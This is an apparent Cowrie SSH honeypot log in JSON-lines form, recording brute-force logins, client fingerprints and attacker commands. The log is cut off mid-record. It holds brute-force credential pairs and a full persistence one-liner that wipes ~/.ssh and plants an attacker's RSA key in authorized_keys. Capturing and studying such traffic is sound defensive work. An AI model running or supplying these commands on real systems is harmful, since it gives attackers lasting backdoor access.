{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:01:01.159223Z","src_ip":"212.227.125.160","session":"d05a38f36992"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:01:02.113146Z","src_ip":"212.227.125.160","session":"d05a38f36992"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:01:02.113902Z","src_ip":"212.227.125.160","session":"d05a38f36992"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:02.270215Z","src_ip":"212.227.125.160","session":"d05a38f36992"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:02.272087Z","src_ip":"212.227.125.160","session":"d05a38f36992"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49464,"dst_ip":"1.2.3.4","dst_port":22,"session":"21ac64152c3a","protocol":"ssh","message":"New connection: 212.227.235.229:49464 (1.2.3.4:22) [session: 21ac64152c3a]","sensor":"my-vps","timestamp":"2025-08-31T01:01:02.885706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:01:02.886733Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:01:02.953569Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.login.success","username":"root","password":"n960..123","message":"login attempt [root/n960..123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:01:03.257212Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:01:03.408441Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:01:03.409133Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:01:03.410154Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:03.477267Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:01:03.677727Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:01:03.678528Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:01:03.746208Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:03.747342Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49854,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3de20796b4b","protocol":"ssh","message":"New connection: 212.227.235.229:49854 (1.2.3.4:22) [session: c3de20796b4b]","sensor":"my-vps","timestamp":"2025-08-31T01:01:03.812927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:01:03.813741Z","src_ip":"212.227.235.229","session":"c3de20796b4b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:01:03.881428Z","src_ip":"212.227.235.229","session":"c3de20796b4b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:01:04.191527Z","src_ip":"212.227.235.229","session":"c3de20796b4b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:05.262153Z","src_ip":"212.227.235.229","session":"c3de20796b4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50386,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3ccc27b4fbe","protocol":"ssh","message":"New connection: 212.227.235.229:50386 (1.2.3.4:22) [session: f3ccc27b4fbe]","sensor":"my-vps","timestamp":"2025-08-31T01:01:05.328798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:01:05.329956Z","src_ip":"212.227.235.229","session":"f3ccc27b4fbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:01:05.400323Z","src_ip":"212.227.235.229","session":"f3ccc27b4fbe"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:01:05.712547Z","src_ip":"212.227.235.229","session":"f3ccc27b4fbe"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:05.781188Z","src_ip":"212.227.235.229","session":"21ac64152c3a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:05.782607Z","src_ip":"212.227.235.229","session":"f3ccc27b4fbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51616,"dst_ip":"1.2.3.4","dst_port":22,"session":"301079521588","protocol":"ssh","message":"New connection: 212.227.235.229:51616 (1.2.3.4:22) [session: 301079521588]","sensor":"my-vps","timestamp":"2025-08-31T01:01:05.931007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:01:05.932348Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:01:06.168763Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.login.success","username":"root","password":"DuckyRoBot","message":"login attempt [root/DuckyRoBot] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:01:07.115005Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:01:07.617398Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:01:07.618208Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:01:07.619103Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:07.858520Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:01:08.389888Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:01:08.390590Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:01:08.630724Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:08.631630Z","src_ip":"212.227.235.229","session":"301079521588"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52834,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d7343cda6a7","protocol":"ssh","message":"New connection: 212.227.235.229:52834 (1.2.3.4:22) [session: 0d7343cda6a7]","sensor":"my-vps","timestamp":"2025-08-31T01:01:08.872832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:01:08.880129Z","src_ip":"212.227.235.229","session":"0d7343cda6a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:01:09.121305Z","src_ip":"212.227.235.229","session":"0d7343cda6a7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:01:10.073660Z","src_ip":"212.227.235.229","session":"0d7343cda6a7"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:01:11.316201Z","src_ip":"212.227.235.229","session":"0d7343cda6a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54634,"dst_ip":"1.2.3.4","dst_port":22,"session":"28784cdc46c4","protocol":"ssh","message":"New connection: 212.227.125.160:54634 (1.2.3.4:22) [session: 28784cdc46c4]","sensor":"my-vps","timestamp":"2025-08-31T01:01:11.361023Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38938,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c4ad81d86a5","protocol":"ssh","message":"New connection: 212.227.125.160:38938 (1.2.3.4:22) [session: 2c4ad81d86a5]","sensor":"my-vps","timestamp":"2025-08-31T01:01:11.385021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:01:11.385997Z","src_ip":"212.227.125.160","session":"2c4ad81d86a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:01:11.458053Z","src_ip":"212.227.125.160","session":"2c4ad81d86a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53972,"dst_ip":"1.2.3.4","dst_port":22,"session":"67811714da92","protocol":"ssh","message":"New connection: 212.227.235.229:53972 (1.2.3.4:22) [session: 67811714da92]","sensor":"my-vps","timestamp":"2025-08-31T01:01:11.553434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:01:11.557403Z","src_ip":"212.227.235.229","session":"67811714da92"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:01:11.727150Z","src_ip":"212.227.125.160","session":"2c4ad81d86a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 